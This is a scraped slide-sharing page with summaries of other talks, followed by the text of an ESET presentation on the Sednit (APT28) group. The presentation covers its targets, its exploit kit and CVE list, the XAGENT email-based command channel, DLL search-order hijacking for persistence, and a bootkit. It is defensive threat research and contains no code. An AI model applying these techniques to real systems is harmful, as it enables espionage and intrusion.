Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
- The author discusses their journey doing source code reviews to find bugs in WordPress plugins and themes. They started with just two people manually reviewing code but then automated the process and expanded their team.
- Through their Phase 1 efforts analyzing over 250 plugins, they found over 250 issues. They are now focusing on authenticated vulnerabilities in Phase 2 like SQL injection, XSS, and CSRF.
- They have created some open source tools to help with the process and are seeking volunteers to help make open source software more secure by joining their Codevigilant platform.
Demo Showcase: Graphs for Cybersecurity in ActionNeo4j
This document discusses how graph databases can help with cyber security challenges. It begins with an introduction to the presenter and an acknowledgement that cyber security is a serious issue. The presentation argues that graphs can provide a holistic view of connected enterprise data to help with risk assessment, protection of critical assets, anomaly detection, rapid response, and recovery from incidents. It provides an example of how Neo4j was used to analyze a targeted Windows attack. The document concludes with a demonstration of using Neo4j and graph techniques to analyze Windows domain auditing data and assess exposure/risk.
Protect Your Payloads: Modern Keying TechniquesLeo Loobeek
The document discusses keying techniques for encrypting payloads in a way that only allows decryption on specific target systems. It covers using local system resources like environment variables or file paths to derive encryption keys. It also introduces using remote resources like web pages or DNS records hosted by the attacker to control when payloads execute. Tools like Ebowla, KeyRing, and KeyServer are presented as ways to implement these keying techniques for various scripting languages and to automate controlling remote keys. The goal is to make payloads only executable on intended targets and to maintain control over payload execution.
John Bambenek discusses tracking exploit kits by monitoring their infrastructure and operations. He explains that by disrupting entire exploit kit ecosystems, more can be done than taking down individual malware operators. Bambenek describes how exploit kits work and outlines strategies for gathering intelligence on exploit kits, such as decoding landing pages, using PCREs to find new sites, and leveraging resources like Bing's malicious URL feed to collect potential targets for dynamic analysis. The goal is to develop intelligence that can be used to disrupt the operations of exploit kit operators and affiliates.
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And, he'll give you some useful guidelines on how to close the gaps yourself.
This document provides information about ADRecon, a tool for gathering information from an Active Directory environment. It extracts and combines artifacts like users, groups, and permissions and presents them in an Excel report. The document discusses the tool's modules, prerequisites, and who uses it. It also covers how to audit directory service access and detect enumeration with ADRecon through techniques like deploying deception objects and enabling auditing on uncommon attributes.
Talk about Andromeda at Botconf 2015. Abstract:
Andromeda, also known as Gamarue by some Antivirus vendors, is a popular and modular bot active since 2011. It is normally used to spread additional malware, but sometimes, depending on the criminals, the main objective could be just stealing user credentials. After almost five years of life its development has not stopped. The people behind it keep maintaining it and adding functionalities, like new anti-analysis routines, changes in the communication encryption, new request formats, etc.
This talk will not give just details about the latest changes in the Andromeda binary and control panel, but it will also respond some interesting questions about this botnet. Which are the most popular versions used nowadays? Are most of the botnets spreading malware or just using its plugins? What are the most popular plugins? How and where is Andromeda sold? Who is selling it? What criminal groups are using Andromeda? It is not just a talk about malware reversing but about the whole Andromeda ecosystem.
For those of you who missed it, this is my slide deck from SecTor 2009, "When Web 2.0 Attacks!" ... reference to Web 2.0, and many of the technologies that make up the mish-mash that makes today's web application landscape so impossible to secure.
Sthack 2015 - Ramon Vicens & Victor Acin - Cyber threats "the reality"StHack
The main idea behind this talk is to introduce the listeners of Sthack conference to the current landscape in the botnet threats. We'll begin talking about the main types of malware botnets: Trojan Bankers, Point of Sales and Credential Stealers, but we will focus on how some of these botnets operate in a technical level, specially, how the bots of Dyre, JackPoS and Pony are working nowadays in order to steal credit cards and banking credentials.
Cisco Connect Toronto 2017 - Security Through The Eyes of a HackerCisco Canada
The document discusses various hacking techniques depicted in the TV show Mr. Robot and used by cyber attackers, and how Cisco consultants use similar tools and methods. It provides examples of how characters in Mr. Robot hacked systems like a thermostat by splicing into the BACnet network, stole credentials using a Rubber Ducky USB and Mimikatz, and carried out phishing attacks using the Social Engineering Toolkit. Cisco consultants conduct penetration tests using vulnerabilities like Shellshock, post-exploitation tools like Mimikatz and John the Ripper, and social engineering assessments. The document emphasizes that understanding the cyber attack lifecycle or "kill chain" is important for effective incident response.
During this talk, we looked at some of the typical controls that Android/iOS applications exhibit, how they work, how to spot them, and how to sidestep them. We’ll demonstrate analysis and techniques using free open source tooling such as Radare and Frida, and for some parts, we’ll use IDA Pro. And since “automation” is the buzzword of the year, we’ll discuss how to automate some of these activities, which typically take up most of the assessment window.
For more information, please visit our website at www.synopsys.com/software
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
This document provides an overview of malware on Android systems. It discusses the Android architecture and security model, how to analyze Android application packages (APKs), and techniques for reverse engineering and creating Android malware. Specific malware examples like Trojan-SMS.FakePlayer.a and Geinimi are described. The document also covers tools for mobile application penetration testing and discusses both legal and illegal ways that Android malware can generate money.
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
Derbycon 2011
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
This document discusses using honeypots to reverse penetrate attackers and gain intelligence on them. It describes how a honeypot was used to collect information from attackers like usernames, source IPs, and intermediate hosts. On some occasions, it allowed gaining access to third party services those attackers had authenticated with. The document concludes honeypots can provide useful intelligence but also raises legal and ethical concerns with counterattacking or collecting personal information.
This document discusses using honeypots to reverse penetrate attackers and gain intelligence on them. It describes how a honeypot was used to collect information from attackers like usernames, source IPs, and intermediate hosts. On some occasions, it was able to exploit browsers or third party services to gather additional data like email addresses. However, more skilled attackers avoided running untrusted software. The document concludes honeypots can provide useful intelligence but also raises moral and legal issues with counterattacking or exploiting attackers.
This cybersecurity training involves watching an informative webinar video to earn knowledge on the topic, taking a 20 question exam to test understanding of the material, and receiving a certificate by email for scores over 70% to demonstrate completion of the training.
This cybersecurity awareness training document outlines steps to take a webinar on cybersecurity, distribute the training link within an organization, and download free materials to track team performance.
How to implement a robust information security management system?ESET
An Information Security Management System (ISMS) involves implementing and maintaining processes to efficiently manage the protection of information and, in doing so, ensuring its integrity, confidentiality and availability. You may implement guidelines set out in ISO 27001, COBIT, NIST or in any other similar framework or you may even create your own management system. What matters in order to make ISMS efficient is to consider all these factors of the cycle.
#AntimalwareDay: The ESET Celebration of the Origins of Computer Defense in N...ESET
On November 3, 1983, Frederick Cohen, a student at the engineering school of the University of Southern California (USC), was sure that a malicious program could be used to exploit any connected system, but he wondered how long it would take for the code to do so.
He prepared a prototype that – after eight hours of hard work on a VAX 11/750 system running Unix – was ready to be shown at the weekly security seminar he attended. It was his lecturer, Leonard Adleman, who baptized that program as a computer virus.
Read more about #AntimalwareDay on WeLiveSecurity.com: https://goo.gl/QCSnc5
ESET Quick Guide to the EU General Data Protection RegulationESET
The General Data Protection Regulation (GDPR) is an EU-wide reform of data protection laws and policies that will take effect in 2018. It aims to strengthen and unify data protection for individuals within the EU. Key changes include requirements for companies to notify customers of data breaches, higher fines for noncompliance, and "data protection by design" where privacy is built into products from the start. The GDPR requires organizations to implement encryption and other security measures to protect personal data and ensure its confidentiality.
This document summarizes a presentation on Advanced Persistent Threats (APTs) given by Aryeh Goretsky, a Distinguished Researcher at ESET. The presentation defines APTs as determined adversaries who conduct cyber attacks in phases, including reconnaissance of targets, analysis of vulnerabilities, development of tools to exploit vulnerabilities, trial runs of attacks, and implantation of attacks on targets. It discusses techniques used in APTs, such as rootkits, command and control servers, custom file systems and partitions, evasion methods, firmware attacks, and programming languages. The presentation aims to explain how to think like a determined adversary conducting a cyber attack campaign.
Presentation of ESET researcher Olivier Bilodeau from Virus Bulletin Conference 2015.
Embedded Linux platforms have been increasingly targeted by malware authors over the past few years. The targeted devices, labelled under the umbrella term 'Internet of Things', are generally consumer routers, gateways or modems. They are compromised remotely via brute-forcing of their credentials or being victim of an unpatched vulnerability, such as the infamous Shellshock. Most of these compromises result in the targeted system being assimilated into a botnet.
Read more about Linux/Moose here: http://www.welivesecurity.com/2015/05/26/dissecting-linuxmoose/
Unpack your troubles*: .NET packer tricks and countermeasuresESET
This document discusses techniques used by .NET packers to obfuscate code and evade analysis. It covers how packers load encrypted next layers using Assembly.Load(), encrypt user strings and reference them using tokens, and hide and restore CIL code at JIT time. The author then provides solutions for analyzing packed samples, such as setting breakpoints on Assembly.Load() to detect next layers, and on JIT resolution APIs to catch decrypted code and strings. Sample Windbg scripts and a whitepaper are referenced for further technical details.
ESET: #DoMore With Our Comprehensive Range of Business ProductsESET
This document provides an overview of ESET, an IT security company founded in 1987. It details ESET's headquarters in Bratislava, regional centers, malware research centers, and worldwide presence with over 1,000 employees. The document highlights ESET's comprehensive range of business security products, including endpoint protection, data access protection, scanning and update options, and usability features. It also summarizes ESET's technology alliances and added value services like premium support and cutting-edge detection technologies.
Following months of in-depth worldwide business user research and thousands of man-hours spent on its development, we are proudly introducing the new, completely re-engineered and redesigned line of #ESET business security products, now available worldwide. Check out our multi-layered security solutions and #DoMore!
http://www.eset.com/int/about/press/articles/products/article/esets-next-generation-business-security-products-now-available-worldwide
ESET: Delivering Benefits to Medium and Large BusinessesESET
Following months of in-depth worldwide business user research and thousands of man-hours spent on its development, we are proudly introducing the new, completely re-engineered and redesigned line of #ESET business security products, now available worldwide. Check out our multi-layered security solutions and #DoMore!
http://www.eset.com/int/about/press/articles/products/article/esets-next-generation-business-security-products-now-available-worldwide
Our researcher Aryeh Goretsky took a look at some of the more interesting pieces of malware and threats that have occurred over the first six months of the year 2014. And what a year it has been, with some serious new developments as well as persistence of numerous older threats.
Learn more about ESET and our soulutions for mobile platformsESET
ESET, the pioneer of proactive protection and the maker of the award-winning ESET NOD32® technology, is a worldwide provider of security solutions for over 26 years. The global leader in proactive detection showcased its flagship application for Android smartphones and tablets - ESET Mobile Security, and ESET Secure Authentication, a powerful 2 factor authentication solution for most mobile platforms. Coinciding with the Mobile World Congress, ESET is launching a #mobileweek initiative enabling users to enjoy premium features of ESET Mobile Security at just the half of its original price on Google Play and Amazon App Store.
Trends for 2014: The Challenge of Internet PrivacyESET
ESET‘s annual threat trends report, which addresses several subjects in Information Security the aim of this
report is to make the community aware of the present computer threat landscape and, accordingly, attempt to predict its possible evolution in the coming years.
Find more information on WeLiveSecurity.com: http://www.welivesecurity.com/2013/12/17/esets-threat-trends-predictions-2014-the-next-battle-for-internet-privacy-a-new-assault-on-androids-and-a-new-wave-of-hi-tech-malware/
How to Manage Your Lost Opportunities in Odoo 17 CRMCeline George
Odoo 17 CRM allows us to track why we lose sales opportunities with "Lost Reasons." This helps analyze our sales process and identify areas for improvement. Here's how to configure lost reasons in Odoo 17 CRM
Strategies for Effective Upskilling is a presentation by Chinwendu Peace in a Your Skill Boost Masterclass organisation by the Excellence Foundation for South Sudan on 08th and 09th June 2024 from 1 PM to 3 PM on each day.
Leveraging Generative AI to Drive Nonprofit InnovationTechSoup
In this webinar, participants learned how to utilize Generative AI to streamline operations and elevate member engagement. Amazon Web Service experts provided a customer specific use cases and dived into low/no-code tools that are quick and easy to deploy through Amazon Web Service (AWS.)
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...PECB
Denis is a dynamic and results-driven Chief Information Officer (CIO) with a distinguished career spanning information systems analysis and technical project management. With a proven track record of spearheading the design and delivery of cutting-edge Information Management solutions, he has consistently elevated business operations, streamlined reporting functions, and maximized process efficiency.
Certified as an ISO/IEC 27001: Information Security Management Systems (ISMS) Lead Implementer, Data Protection Officer, and Cyber Risks Analyst, Denis brings a heightened focus on data security, privacy, and cyber resilience to every endeavor.
His expertise extends across a diverse spectrum of reporting, database, and web development applications, underpinned by an exceptional grasp of data storage and virtualization technologies. His proficiency in application testing, database administration, and data cleansing ensures seamless execution of complex projects.
What sets Denis apart is his comprehensive understanding of Business and Systems Analysis technologies, honed through involvement in all phases of the Software Development Lifecycle (SDLC). From meticulous requirements gathering to precise analysis, innovative design, rigorous development, thorough testing, and successful implementation, he has consistently delivered exceptional results.
Throughout his career, he has taken on multifaceted roles, from leading technical project management teams to owning solutions that drive operational excellence. His conscientious and proactive approach is unwavering, whether he is working independently or collaboratively within a team. His ability to connect with colleagues on a personal level underscores his commitment to fostering a harmonious and productive workplace environment.
Date: May 29, 2024
Tags: Information Security, ISO/IEC 27001, ISO/IEC 42001, Artificial Intelligence, GDPR
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: ISO/IEC 27001 Information Security Management System - EN | PECB
ISO/IEC 42001 Artificial Intelligence Management System - EN | PECB
General Data Protection Regulation (GDPR) - Training Courses - EN | PECB
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
Chapter wise All Notes of First year Basic Civil Engineering.pptxDenish Jangid
Chapter wise All Notes of First year Basic Civil Engineering
Syllabus
Chapter-1
Introduction to objective, scope and outcome the subject
Chapter 2
Introduction: Scope and Specialization of Civil Engineering, Role of civil Engineer in Society, Impact of infrastructural development on economy of country.
Chapter 3
Surveying: Object Principles & Types of Surveying; Site Plans, Plans & Maps; Scales & Unit of different Measurements.
Linear Measurements: Instruments used. Linear Measurement by Tape, Ranging out Survey Lines and overcoming Obstructions; Measurements on sloping ground; Tape corrections, conventional symbols. Angular Measurements: Instruments used; Introduction to Compass Surveying, Bearings and Longitude & Latitude of a Line, Introduction to total station.
Levelling: Instrument used Object of levelling, Methods of levelling in brief, and Contour maps.
Chapter 4
Buildings: Selection of site for Buildings, Layout of Building Plan, Types of buildings, Plinth area, carpet area, floor space index, Introduction to building byelaws, concept of sun light & ventilation. Components of Buildings & their functions, Basic concept of R.C.C., Introduction to types of foundation
Chapter 5
Transportation: Introduction to Transportation Engineering; Traffic and Road Safety: Types and Characteristics of Various Modes of Transportation; Various Road Traffic Signs, Causes of Accidents and Road Safety Measures.
Chapter 6
Environmental Engineering: Environmental Pollution, Environmental Acts and Regulations, Functional Concepts of Ecology, Basics of Species, Biodiversity, Ecosystem, Hydrological Cycle; Chemical Cycles: Carbon, Nitrogen & Phosphorus; Energy Flow in Ecosystems.
Water Pollution: Water Quality standards, Introduction to Treatment & Disposal of Waste Water. Reuse and Saving of Water, Rain Water Harvesting. Solid Waste Management: Classification of Solid Waste, Collection, Transportation and Disposal of Solid. Recycling of Solid Waste: Energy Recovery, Sanitary Landfill, On-Site Sanitation. Air & Noise Pollution: Primary and Secondary air pollutants, Harmful effects of Air Pollution, Control of Air Pollution. . Noise Pollution Harmful Effects of noise pollution, control of noise pollution, Global warming & Climate Change, Ozone depletion, Greenhouse effect
Text Books:
1. Palancharmy, Basic Civil Engineering, McGraw Hill publishers.
2. Satheesh Gopi, Basic Civil Engineering, Pearson Publishers.
3. Ketki Rangwala Dalal, Essentials of Civil Engineering, Charotar Publishing House.
4. BCP, Surveying volume 1
हिंदी वर्णमाला पीपीटी, hindi alphabet PPT presentation, hindi varnamala PPT, Hindi Varnamala pdf, हिंदी स्वर, हिंदी व्यंजन, sikhiye hindi varnmala, dr. mulla adam ali, hindi language and literature, hindi alphabet with drawing, hindi alphabet pdf, hindi varnamala for childrens, hindi language, hindi varnamala practice for kids, https://www.drmullaadamali.com
LAND USE LAND COVER AND NDVI OF MIRZAPUR DISTRICT, UPRAHUL
This Dissertation explores the particular circumstances of Mirzapur, a region located in the
core of India. Mirzapur, with its varied terrains and abundant biodiversity, offers an optimal
environment for investigating the changes in vegetation cover dynamics. Our study utilizes
advanced technologies such as GIS (Geographic Information Systems) and Remote sensing to
analyze the transformations that have taken place over the course of a decade.
The complex relationship between human activities and the environment has been the focus
of extensive research and worry. As the global community grapples with swift urbanization,
population expansion, and economic progress, the effects on natural ecosystems are becoming
more evident. A crucial element of this impact is the alteration of vegetation cover, which plays a
significant role in maintaining the ecological equilibrium of our planet.Land serves as the foundation for all human activities and provides the necessary materials for
these activities. As the most crucial natural resource, its utilization by humans results in different
'Land uses,' which are determined by both human activities and the physical characteristics of the
land.
The utilization of land is impacted by human needs and environmental factors. In countries
like India, rapid population growth and the emphasis on extensive resource exploitation can lead
to significant land degradation, adversely affecting the region's land cover.
Therefore, human intervention has significantly influenced land use patterns over many
centuries, evolving its structure over time and space. In the present era, these changes have
accelerated due to factors such as agriculture and urbanization. Information regarding land use and
cover is essential for various planning and management tasks related to the Earth's surface,
providing crucial environmental data for scientific, resource management, policy purposes, and
diverse human activities.
Accurate understanding of land use and cover is imperative for the development planning
of any area. Consequently, a wide range of professionals, including earth system scientists, land
and water managers, and urban planners, are interested in obtaining data on land use and cover
changes, conversion trends, and other related patterns. The spatial dimensions of land use and
cover support policymakers and scientists in making well-informed decisions, as alterations in
these patterns indicate shifts in economic and social conditions. Monitoring such changes with the
help of Advanced technologies like Remote Sensing and Geographic Information Systems is
crucial for coordinated efforts across different administrative levels. Advanced technologies like
Remote Sensing and Geographic Information Systems
9
Changes in vegetation cover refer to variations in the distribution, composition, and overall
structure of plant communities across different temporal and spatial scales. These changes can
occur natural.
This presentation was provided by Steph Pollock of The American Psychological Association’s Journals Program, and Damita Snow, of The American Society of Civil Engineers (ASCE), for the initial session of NISO's 2024 Training Series "DEIA in the Scholarly Landscape." Session One: 'Setting Expectations: a DEIA Primer,' was held June 6, 2024.
Main Java[All of the Base Concepts}.docxadhitya5119
This is part 1 of my Java Learning Journey. This Contains Custom methods, classes, constructors, packages, multithreading , try- catch block, finally block and more.
1. Visiting The Bear Den
A Journey in the Land of (Cyber-)Espionage
Joan Calvet
Jessy Campos
Thomas Dupuy
1
2. Sednit Group
• Also know as APT28, Fancy Bear, Sofacy,
STRONTIUM, Tsar Team
• Group of attackers doing targeted attacks
since 2006
• Mainly interested into geopolitics
2
3. 3
Plan
• Context
• The Week Serge Met The Bear
• The Mysterious DOWNDELPH
• Speculative Mumblings
5. Who Is The Bear After? (1)
• We found a list of targets for Sednit
phishing campaigns:
– Operators used Bitly and “forgot” to set the
profile private
(feature now removed from Bitly)
– Around 4,000 shortened URLs during 6
months in 2015
5
10. Who Is The Bear After? (3)
• Embassies and ministries of more than 40 countries
• NATO and EU institutions
• “Who’s who” of individuals involved in Eastern Europe
politics:
– Politicians
– Activists
– Journalists
– Academics
– Militaries
– …
7
11. The Bear Has Money
• A bag full of 0-day exploits:
8
2015
Apr May Jun Jul Aug Sep Oct
CVE-2015-3043 (Flash)
CVE-2015-1701 (Windows LPE)
CVE-2015-2590 (Java)
CVE-2015-4902 (Java click-to-play bypass)
CVE-2015-7645
(Flash)
CVE-2015-2424 (Office RCE)
12. The Bear Can Code
• Tens of custom-made software used since 2006:
– Droppers
– Downloaders
– Reconnaissance tools
– Long-term spying backdoors
– Encryption proxy tool
– USB C&C channel
– Many helper tools
– …
9
13. Disclaimers
• Over the last two years we tracked Sednit closely,
but of course our visibility is not exhaustive
• How do we know it is ONE group?
– We don’t
– Our Sednit “definition” is based on their toolkit and the
related infrastructure
• We do not do attribution (but we point out hints that may
be used for that)
10
15. Who Is Serge?
• Code name for an imaginary Sednit target
• Serge is a government employee with access to
sensitive information
• The chain of events in Serge’s attack matches
several real cases we investigated
• We use it as a textbook case to present (a part of)
the Sednit toolkit
12
23. …Serge Meets SEDKIT
• Exploit-kit for targeted attacks
• Entry-point URLs mimic legitimate URLs
• Usually propagated by targeted phishing emails
(also seen with hacked website + iframe)
• Period of activity: September 2014 - Now
17
30. … and Visits Sednit Exploits Factory
Vulnerability Targeted Application Note
CVE-2013-1347 Internet Explorer 8
CVE-2013-3897 Internet Explorer 8
CVE-2014-1510 +
CVE-2014-1511
Firefox
CVE-2014-1776 Internet Explorer 11
CVE-2014-6332 Internet Explorer Several versions
N/A MacKeeper
CVE-2015-2590 +
CVE-2015-4902
Java 0-day*
CVE-2015-3043 Adobe Flash 0-day*
CVE-2015-5119 Adobe Flash Hacking Team gift
CVE-2015-7645 Adobe Flash 0-day*
22
* : At the time SEDKIT dropped them
31. … and Visits Sednit Exploits Factory
Vulnerability Targeted Application Note
CVE-2013-1347 Internet Explorer 8
CVE-2013-3897 Internet Explorer 8
CVE-2014-1510 +
CVE-2014-1511
Firefox
CVE-2014-1776 Internet Explorer 11
CVE-2014-6332 Internet Explorer Several versions
N/A MacKeeper
CVE-2015-2590 +
CVE-2015-4902
Java 0-day*
CVE-2015-3043 Adobe Flash 0-day*
CVE-2015-5119 Adobe Flash Hacking Team gift
CVE-2015-7645 Adobe Flash 0-day*
23
* : At the time SEDKIT dropped them
32. … and Visits Sednit Exploits Factory
Vulnerability Targeted Application Note
CVE-2013-1347 Internet Explorer 8
CVE-2013-3897 Internet Explorer 8
CVE-2014-1510 +
CVE-2014-1511
Firefox
CVE-2014-1776 Internet Explorer 11
CVE-2014-6332 Internet Explorer Several versions
N/A MacKeeper
CVE-2015-2590 +
CVE-2015-4902
Java 0-day*
CVE-2015-3043 Adobe Flash 0-day*
CVE-2015-5119 Adobe Flash Hacking Team gift
CVE-2015-7645 Adobe Flash 0-day*
24
* : At the time SEDKIT dropped them
33. … and Visits Sednit Exploits Factory
Vulnerability Targeted Application Note
CVE-2013-1347 Internet Explorer 8
CVE-2013-3897 Internet Explorer 8
CVE-2014-1510 +
CVE-2014-1511
Firefox
CVE-2014-1776 Internet Explorer 11
CVE-2014-6332 Internet Explorer Several versions
N/A MacKeeper
CVE-2015-2590 +
CVE-2015-4902
Java 0-day*
CVE-2015-3043 Adobe Flash 0-day*
CVE-2015-5119 Adobe Flash Hacking Team gift
CVE-2015-7645 Adobe Flash 0-day*
25
* : At the time SEDKIT dropped them
34. Revamping CVE-2014-6332
(a.k.a. IE “Unicorn bug”)
• October 2015:
– Re-use of public PoC to disable VBScript “SafeMode”
– Next stage binary downloaded by PowerShell
26
35. Revamping CVE-2014-6332
(a.k.a. IE “Unicorn bug”)
• October 2015:
– Re-use of public PoC to disable VBScript “SafeMode”
– Next stage binary downloaded by PowerShell
• February 2016:
– No more “SafeMode” disabling, direct ROP-based
shellcode execution
– Around 400 lines of VBScript, mostly custom
27
41. Serge Meets SEDUPLOADER
(a.k.a. JHUHUGIT, JKEYSKW)
• Downloaded by SEDKIT
• Two binaries: the dropper and its embedded
payload
• Deployed as a first-stage component
• Period of activity: March 2015 - Now
68. …Serge meets SEDRECO
• Downloaded by SEDUPLOADER
• Backdoor with the ability to load external
plugins
• Usually deployed as a second stage backdoor
to spy on the infected computer
• Period of activity : 2012 - Now
48
69. Dropper
• Drops encrypted configuration
– In a file (“msd”)
– In the Windows Registry
• No configuration linked to the payload
97. Serge Meets XAGENT
(a.k.a SPLM, CHOPSTICK)
• Downloaded by SEDUPLOADER
• Modular backdoor developed in C++ with Windows,
Linux and iOS versions
• Deployed in most Sednit operations, usually after the
reconnaissance phase
• Period of activity: November 2012 - Now
57
101. • Linux XAGENT, compiled in July 2015
• ~ 18,000 lines of code in 59 classes
59
102. • Linux XAGENT, compiled in July 2015
• ~ 18,000 lines of code in 59 classes
• Derives from Windows version:
59
103. • Linux XAGENT, compiled in July 2015
• ~ 18,000 lines of code in 59 classes
• Derives from Windows version:
• XAGENT major version 2, but matches the
logic of currently distributed binaries
(version 3)
59
111. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Communication Workflow
XAGENT INFECTED COMPUTER
112. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Communication Workflow
XAGENT INFECTED COMPUTER
113. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Communication Workflow
XAGENT INFECTED COMPUTER
114. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Communication Workflow
XAGENT INFECTED COMPUTER
115. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Communication Workflow
XAGENT INFECTED COMPUTER
116. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Communication Workflow
XAGENT INFECTED COMPUTER
117. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Communication Workflow
XAGENT INFECTED COMPUTER
118. 62
Translates messages
from modules for
the C&C server
Translates messages
from the C&C
server for modules
AgentKernel::run()
AgentKernel
RemoteShell
FSModule
Keylogger
Channel
Controller
Modules
C&C
SERVER
Unencrypted messages
Encrypted messages
Channel
(HTTP or emails)
Communication Workflow
XAGENT INFECTED COMPUTER
124. Emails Channel (1)
Workflow
63
exfil@gmail.com
orders@gmail.comXAGENT INFECTED
COMPUTER
USING MailChannel
SMTPS
POP3S
POP3S
SMTPS
C&C SERVER
An email-based C&C protocol needs to provide:
1. A way to distinguish C&C emails from unrelated emails
2. A way to bypass spam filters
135. XAGENT Proxy Server
• Python code used between April and June
2015
• ~ 12,200 lines of code
136. XAGENT Proxy Server
• Python code used between April and June
2015
• ~ 12,200 lines of code
• Translates email protocol from XAGENT
into a HTTP protocol for the C&C server:
(over HTTP)
P3Protocol
XAGENT PROXY BACKEND
C&C SERVER
INBOX
P2Protocol
137. 68
Serge opens an email
leading to SEDKIT, and then
SEDUPLOADER
9:30AM
SEDRECO deployment
10:00AM
XAGENT deployment
02:00PM
Chain of Events
Mon Tue Wed Thu Fri
139. Serge Meets
Passwords Extractors
• SecurityXploded tools (grand classic of Sednit)
– Cons: usually detected by AV software
• Custom tools, in particular a Windows Live
Mail passwords extractor compiled for Serge:
70
140. Serge Meets
Windows Passwords Extractors
• From registry hives
– Deployed with LPE for CVE-2014-4076
• Good ol’ Mimikatz (“pi.log”)
– Deployed with LPE for CVE-2015-1701
71
155. Code Obfuscation (1)
• Starting in July 2015 XTUNNEL code was
obfuscated
(which is two months after the Sednit attack against
the German parliament, where XTUNNEL was used)
80
156. Code Obfuscation (1)
• Starting in July 2015 XTUNNEL code was
obfuscated
(which is two months after the Sednit attack against
the German parliament, where XTUNNEL was used)
• The obfuscation is a mix of classic syntactic
techniques, like insertion of junk code and
opaque predicates
80
159. 82
Serge opens an email
leading to SEDKIT, and then
SEDUPLOADER
9:30AM
SEDRECO deployment
10:00AM
XAGENT deployment
02:00PM
Information
exfiltration and
lateral movements
Chain of Events
Mon Tue Wed Thu Fri
161. Long Term Persistence (1)
• Special XAGENT copied in Office folder under
the name “msi.dll”
84
162. Long Term Persistence (2)
• system32msi.dll is a legitimate Windows
DLL needed by Office applications
85
163. Long Term Persistence (2)
• system32msi.dll is a legitimate Windows
DLL needed by Office applications
• XAGENT msi.dll exports the same function
names as the legitimate msi.dll:
85
164. Long Term Persistence (3)
• Each time Serge starts Office, XAGENT
msi.dll is loaded (search-order hijacking):
– Loads real msi.dll from system32
– Fills its export table with the addresses of the real
msi.dll functions
– Starts XAGENT malicious logic
86
165. Long Term Persistence (3)
• Each time Serge starts Office, XAGENT
msi.dll is loaded (search-order hijacking):
– Loads real msi.dll from system32
– Fills its export table with the addresses of the real
msi.dll functions
– Starts XAGENT malicious logic
• Same technique also seen with
LINKINFO.dll dropped in C:WINDOWS
86
166. 87
Serge opens an email
leading to SEDKIT, and then
SEDUPLOADER
9:30AM
SEDRECO deployment
10:00AM
XAGENT deployment
02:00PM
Long-term
persistence
method
deployment
11:00AM
Chain of Events
Mon Tue Wed Thu Fri
Information
exfiltration and
lateral movements
170. The Ultimate Boring Component
• Delphi downloader, we named it DOWNDELPH
(slow clap)
• Simple workflow:
– Downloads a config (.INI file)
– Based on the config, downloads a payload
– Executes payload
• Persistence method: Run registry key
171. The Ultimate Boring Component
• Delphi downloader, we named it DOWNDELPH
(slow clap)
• Simple workflow:
– Downloads a config (.INI file)
– Based on the config, downloads a payload
– Executes payload
• Persistence method: Run registry key
172. Let The Hunt Begins
2013 DOWNDELPH Sample
Dropper
Helper Bootkit Installer DOWNDELPH
173. Let The Hunt Begins
2013 DOWNDELPH Sample
Dropper
Helper Bootkit Installer DOWNDELPH
• Infects BIOS-based systems
• Tested on Windows XP/7, 32bit/64bit
• Never been documented
195. Bootkit Workflow
Infected MBR BOOTMGR Winload.exe
ACPI.sys
Bootkit Driver
“Bootkit
user-mode
component”
DOWNDELPH
Real Mode
Protected Mode
Original MBR
Kernel Init
Hook Hook
Hook
Why a DLL to load another DLL ?
